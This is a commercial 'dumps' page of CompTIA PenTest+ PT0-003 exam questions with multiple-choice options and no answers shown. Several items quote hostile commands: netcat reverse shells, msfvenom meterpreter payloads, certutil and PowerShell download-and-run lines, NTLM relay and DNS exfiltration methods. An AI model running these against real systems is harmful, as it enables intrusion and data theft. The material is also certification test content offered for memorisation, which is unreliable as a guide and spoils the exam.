Special Summer Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: save70

Free and Premium CompTIA PT0-003 Dumps Questions Answers

Page: 1 / 14
Total 233 questions

CompTIA PenTest+ Exam Questions and Answers

Question 1

During a vulnerability assessment, a penetration tester configures the scanner sensor and performs the initial vulnerability scanning under the client's internal network. The tester later discusses the results with the client, but the client does not accept the results. The client indicates the host and assets that were within scope are not included in the vulnerability scan results. Which of the following should the tester have done?

Options:

A.

Rechecked the scanner configuration.

B.

Performed a discovery scan.

C.

Used a different scan engine.

D.

Configured all the TCP ports on the scan.

Buy Now
Question 2

A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:

nc -e /bin/sh 10.10.10.16 4444

Which of the following would most likely bypass the filtered space character?

Options:

A.

${IFS}

B.

%0a

C.

+ *

D.

%20

Question 3

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?

Options:

A.

regsvr32 /s /n /u C:\evil.xml

B.

MSBuild.exe C:\evil.xml

C.

mshta.exe C:\evil.xml

D.

AppInstaller.exe C:\evil.xml

Question 4

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?

Options:

A.

FTP

B.

HTTPS

C.

SMTP

D.

DNS

Question 5

A penetration tester downloads a JAR file that is used in an organization's production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester's activities?

Options:

A.

SAST

B.

SBOM

C.

ICS

D.

SCA

Question 6

A penetration tester is getting ready to conduct a vulnerability scan as part of the testing process. The tester will evaluate an environment that consists of a container orchestration cluster. Which of the following tools should the tester use to evaluate the cluster?

Options:

A.

Trivy

B.

Nessus

C.

Grype

D.

Kube-hunter

Question 7

Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?

Options:

A.

Remove the persistence mechanisms.

B.

Spin down the infrastructure.

C.

Preserve artifacts.

D.

Perform secure data destruction.

Question 8

A penetration tester performs several Nmap scans against the web application for a client.

INSTRUCTIONS

Click on the WAF and servers to review the results of the Nmap scans. Then click on

each tab to select the appropriate vulnerability and remediation options.

If at any time you would like to bring back the initial state of the simulation, please

click the Reset All button.

Options:

Question 9

A penetration tester finds an unauthenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is Which of the following should the tester use to perform the task with the fewest web requests?

Options:

A.

nc -e /bin/sh -lp 53

B.

/bin/sh -c 'nc -l -p 443'

C.

nc -e /bin/sh 53

D.

/bin/sh -c 'nc 443'

Question 10

During a security assessment, a penetration tester uses a tool to capture plaintext log-in credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access. Which of the following tools is the tester using?

Options:

A.

Burp Suite

B.

Wireshark

C.

Zed Attack Proxy

D.

Metasploit

Question 11

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Question 12

A penetration tester wants to create a malicious QR code to assist with a physical security assessment. Which of the following tools has the built-in functionality most likely needed for this task?

Options:

A.

BeEF

B.

John the Ripper

C.

ZAP

D.

Evilginx

Question 13

Given the following statements:

    Implement a web application firewall.

    Upgrade end-of-life operating systems.

    Implement a secure software development life cycle.

In which of the following sections of a penetration test report would the above statements be found?

Options:

A.

Executive summary

B.

Attack narrative

C.

Detailed findings

D.

Recommendations

Question 14

A penetration tester needs to confirm the version number of a client's web application server. Which of the following techniques should the penetration tester use?

Options:

A.

SSL certificate inspection

B.

URL spidering

C.

Banner grabbing

D.

Directory brute forcing

Question 15

A penetration tester conducts reconnaissance for a client's network and identifies the following system of interest:

$ nmap -A AppServer1.compita.org

Starting Nmap 7.80 (2023-01-14) on localhost (127.0.0.1) at 2023-08-04 15:32:27

Nmap scan report for AppServer1.compita.org (192.168.1.100)

Host is up (0.001s latency).

Not shown: 999 closed ports

Port State Service

21/tcp open ftp

22/tcp open ssh

23/tcp open telnet

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

445/tcp open microsoft-ds

873/tcp open rsync

8080/tcp open http-proxy

8443/tcp open https-alt

9090/tcp open zeus-admin

10000/tcp open snet-sensor-mgmt

The tester notices numerous open ports on the system of interest. Which of the following best describes this system?

Options:

A.

A honeypot

B.

A Windows endpoint

C.

A Linux server

D.

An already-compromised system

Question 16

During a penetration testing engagement, a tester targets the internet-facing services used by the client. Which of the following describes the type of assessment that should be considered in this scope of work?

Options:

A.

Segmentation

B.

Mobile

C.

External

D.

Web

Question 17

A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to the facility?

Options:

A.

Clone badge information in public areas of the facility to gain access to restricted areas.

B.

Tailgate into the facility during a very busy time to gain initial access.

C.

Pick the lock on the rear entrance to gain access to the facility and try to gain access.

D.

Drop USB devices with malware outside of the facility in order to gain access to internal machines.

Question 18

During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software. Which of the following host-based attacks should the tester use?

Options:

A.

On-path

B.

Logic bomb

C.

Rootkit

D.

Buffer overflow

Question 19

A penetration tester is conducting an assessment of a web application's login page. The tester needs to determine whether there are any hidden form fields of interest. Which of the following is the most effective technique?

Options:

A.

XSS

B.

On-path attack

C.

SQL injection

D.

HTML scraping

Question 20

A penetration tester completes a scan and sees the following output on a host:

bash

Copy code

Nmap scan report for victim (10.10.10.10)

Host is up (0.0001s latency)

PORT STATE SERVICE

161/udp open|filtered snmp

445/tcp open microsoft-ds

3389/tcp open microsoft-ds

Running Microsoft Windows 7

OS CPE: cpe:/o:microsoft:windows_7_sp0

The tester wants to obtain shell access. Which of the following related exploits should the tester try first?

Options:

A.

exploit/windows/smb/psexec

B.

exploit/windows/smb/ms08_067_netapi

C.

exploit/windows/smb/ms17_010_eternalblue

D.

auxiliary/scanner/snmp/snmp_login

Question 21

During an engagement, a penetration tester needs to break the key for the Wi-Fi network that uses WPA2 encryption. Which of the following attacks would accomplish this objective?

Options:

A.

ChopChop

B.

Replay

C.

Initialization vector

D.

KRACK

Question 22

As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands. Which of the following techniques would the penetration tester most likely use to access the sensitive data?

Options:

A.

Logic bomb

B.

SQL injection

C.

Brute-force attack

D.

Cross-site scripting

Question 23

During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?

Options:

A.

A collection of email addresses for the target domain that is available on multiple sources on the internet

B.

DNS records for the target domain and subdomains that could be used to increase the external attack surface

C.

Data breach information about the organization that could be used for additional enumeration

D.

Information from the target's main web page that collects usernames, metadata, and possible data exposures

Question 24

A penetration tester gains access to a Windows machine and wants to further enumerate users with native operating system credentials. Which of the following should the tester use?

Options:

A.

route

B.

nbtstat

C.

net

D.

whoami

Question 25

A penetration tester currently conducts phishing reconnaissance using various tools and accounts for multiple intelligence-gathering platforms. The tester wants to consolidate some of the tools and accounts into one solution to analyze the output from the intelligence-gathering tools. Which of the following is the best tool for the penetration tester to use?

Options:

A.

Caldera

B.

SpiderFoot

C.

Maltego

D.

WIGLE.net

Question 26

A penetration tester needs to complete cleanup activities from the testing lead. Which of the following should the tester do to validate that reverse shell payloads are no longer running?

Options:

A.

Run scripts to terminate the implant on affected hosts.

B.

Spin down the C2 listeners.

C.

Restore the firewall settings of the original affected hosts.

D.

Exit from C2 listener active sessions.

Question 27

Which of the following is within the scope of proper handling and most crucial when working on a penetration testing report?

Options:

A.

Keeping both video and audio of everything that is done

B.

Keeping the report to a maximum of 5 to 10 pages in length

C.

Basing the recommendation on the risk score in the report

D.

Making the report clear for all objectives with a precise executive summary

Question 28

During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:

findstr /SIM /C:"pass" *.txt *.cfg *.xml

Which of the following is the penetration tester trying to enumerate?

Options:

A.

Configuration files

B.

Permissions

C.

Virtual hosts

D.

Secrets

Question 29

During an assessment, a penetration tester runs the following command:

dnscmd.exe /config /serverlevelplugindll C:\users\necad-TA\Documents\adduser.dll

Which of the following is the penetration tester trying to achieve?

Options:

A.

DNS enumeration

B.

Privilege escalation

C.

Command injection

D.

A list of available users

Question 30

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output:

kotlin

Copy code

Nmap scan report for some_host

Host is up (0.01 latency).

PORT STATE SERVICE

445/tcp open microsoft-ds

Host script results: smb2-security-mode: Message signing disabled

Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?

Options:

A.

responder -T eth0 -dwv ntlmrelayx.py -smb2support -tf

B.

msf > use exploit/windows/smb/ms17_010_psexec msf > msf > run

C.

hydra -L administrator -P /path/to/passwdlist smb://

D.

nmap —script smb-brute.nse -p 445

Question 31

During a security audit, a penetration tester wants to run a process to gather information about a target network's domain structure and associated IP addresses. Which of the following tools should the tester use?

Options:

A.

Dnsenum

B.

Nmap

C.

Netcat

D.

Wireshark

Question 32

During a penetration test, a tester captures information about an SPN account. Which of the following attacks requires this information as a prerequisite to proceed?

Options:

A.

Golden Ticket

B.

Kerberoasting

C.

DCShadow

D.

LSASS dumping

Question 33

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?

Options:

A.

powershell.exe impo C:\tools\foo.ps1

B.

certutil.exe -f https://192.168.0.1/foo.exe bad.exe

C.

powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")

D.

rundll32.exe c:\path\foo.dll,functName

Question 34

A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection. Which of the following tools would the tester most likely use?

Options:

A.

netsh.exe

B.

certutil.exe

C.

nc.exe

D.

cmdkey.exe

Question 35

A penetration tester is ready to add shellcode for a specific remote executable exploit. The tester is trying to prevent the payload from being blocked by antimalware that is running on the target. Which of the following commands should the tester use to obtain shell access?

Options:

A.

msfvenom --arch x86-64 --platform windows --encoder x86-64/shikata_ga_nai --payload windows/bind_tcp LPORT=443

B.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.100 LPORT=8000

C.

msfvenom --arch x86-64 --platform windows --payload windows/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 EXITFUNC=none

D.

net user add /administrator | hexdump > payload

Question 36

During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops. Which of the following technical controls should the tester recommend to reduce the risk of compromise?

Options:

A.

Multifactor authentication

B.

Patch management

C.

System hardening

D.

Network segmentation

Question 37

A penetration tester has discovered sensitive files on a system. Assuming exfiltration of the files is part of the scope of the test, which of the following is most likely to evade DLP systems?

Options:

A.

Encoding the data and pushing through DNS to the tester's controlled server.

B.

Padding the data and uploading the files through an external cloud storage service.

C.

Obfuscating the data and pushing through FTP to the tester's controlled server.

D.

Hashing the data and emailing the files to the tester's company inbox.

Question 38

A previous penetration test report identified a host with vulnerabilities that was

successfully exploited. Management has requested that an internal member of the

security team reassess the host to determine if the vulnerability still exists.

Part 1:

. Analyze the output and select the command to exploit the vulnerable service.

Part 2:

. Analyze the output from each command.

· Select the appropriate set of commands to escalate privileges.

· Identify which remediation steps should be taken.

Options:

Question 39

A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?

Host | CVSS | EPSS

Target 1 | 4 | 0.6

Target 2 | 2 | 0.3

Target 3 | 1 | 0.6

Target 4 | 4.5 | 0.4

Options:

A.

Target 1: CVSS Score = 4 and EPSS Score = 0.6

B.

Target 2: CVSS Score = 2 and EPSS Score = 0.3

C.

Target 3: CVSS Score = 1 and EPSS Score = 0.6

D.

Target 4: CVSS Score = 4.5 and EPSS Score = 0.4

Question 40

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).

Options:

A.

schtasks.exe

B.

rundll.exe

C.

cmd.exe

D.

chgusr.exe

E.

sc.exe

F.

netsh.exe

Question 41

A penetration tester is attempting to exfiltrate sensitive data from a client environment without alerting the client's blue team. Which of the following exfiltration methods most likely remain undetected?

Options:

A.

Cloud storage

B.

Email

C.

Domain Name System

D.

Test storage sites

Question 42

During a security assessment, a penetration tester gains access to an internal server and manipulates some data to hide its presence. Which of the following is the best way for the penetration tester to hide the activities performed?

Options:

A.

Clear the Windows event logs.

B.

Modify the system time.

C.

Alter the log permissions.

D.

Reduce the log retention settings.

Question 43

A penetration tester attempts unauthorized entry to the company's server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?

Options:

A.

Plug spinner

B.

Bypassing

C.

Decoding

D.

Raking

Question 44

During an assessment, a penetration tester plans to gather metadata from various online files, including pictures. Which of the following standards outlines the formats for pictures, audio, and additional tags that facilitate this type of reconnaissance?

Options:

A.

EXIF

B.

GIF

C.

COFF

D.

ELF

Question 45

A penetration tester would like to leverage a CSRF vulnerability to gather sensitive details from an application's end users. Which of the following tools should the tester use for this task?

Options:

A.

Browser Exploitation Framework

B.

Maltego

C.

Metasploit

D.

theHarvester

Question 46

During a red-team exercise, a penetration tester obtains an employee's access badge. The tester uses the badge's information to create a duplicate for unauthorized entry. Which of the following best describes this action?

Options:

A.

Smurfing

B.

Credential stuffing

C.

RFID cloning

D.

Card skimming

Question 47

Which of the following is the most efficient way to infiltrate a file containing data that could be sensitive?

Options:

A.

Use steganography and send the file over FTP

B.

Compress the file and send it using TFTP

C.

Split the file in tiny pieces and send it over dnscat

D.

Encrypt and send the file over HTTPS

Question 48

While conducting a peer review for a recent assessment, a penetration tester finds the debugging mode is still enabled for the production system. Which of the following is most likely responsible for this observation?

Options:

A.

Configuration changes were not reverted.

B.

A full backup restoration is required for the server.

C.

The penetration test was not completed on time.

D.

The penetration tester was locked out of the system.

Question 49

A penetration tester has just started a new engagement. The tester is using a framework that breaks the life cycle into 14 components. Which of the following frameworks is the tester using?

Options:

A.

OWASP MASVS

B.

OSSTMM

C.

MITRE ATT&CK

D.

CREST

Question 50

During an assessment, a penetration tester runs the following command:

setspn.exe -Q /

Which of the following attacks is the penetration tester preparing for?

Options:

A.

LDAP injection

B.

Pass-the-hash

C.

Kerberoasting

D.

Dictionary

Question 51

A penetration tester writes the following script to enumerate a 1724 network:

1 #!/bin/bash

2 for i in {1..254}; do

3 ping -c1 192.168.1.$i

4 done

The tester executes the script, but it fails with the following error:

-bash: syntax error near unexpected token `ping'

Which of the following should the tester do to fix the error?

Options:

A.

Add do after line 2.

B.

Replace {1..254} with $(seq 1 254).

C.

Replace bash with tsh.

D.

Replace $i with ${i}.

Question 52

A penetration tester successfully clones a source code repository and then runs the following command:

find . -type f -exec egrep -i "token|key|login" {} \;

Which of the following is the penetration tester conducting?

Options:

A.

Data tokenization

B.

Secrets scanning

C.

Password spraying

D.

Source code analysis

Question 53

A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:

Hostname | IP address | CVSS 2.0 | EPSS

hrdatabase | 192.168.20.55 | 9.9 | 0.50

financesite | 192.168.15.99 | 8.0 | 0.01

legaldatabase | 192.168.10.2 | 8.2 | 0.60

fileserver | 192.168.125.7 | 7.6 | 0.90

Which of the following targets should the tester select next?

Options:

A.

fileserver

B.

hrdatabase

C.

legaldatabase

D.

financesite

Question 54

Which of the following can an access control vestibule help deter?

Options:

A.

USB drops

B.

Badge cloning

C.

Lock picking

D.

Tailgating

Page: 1 / 14
Total 233 questions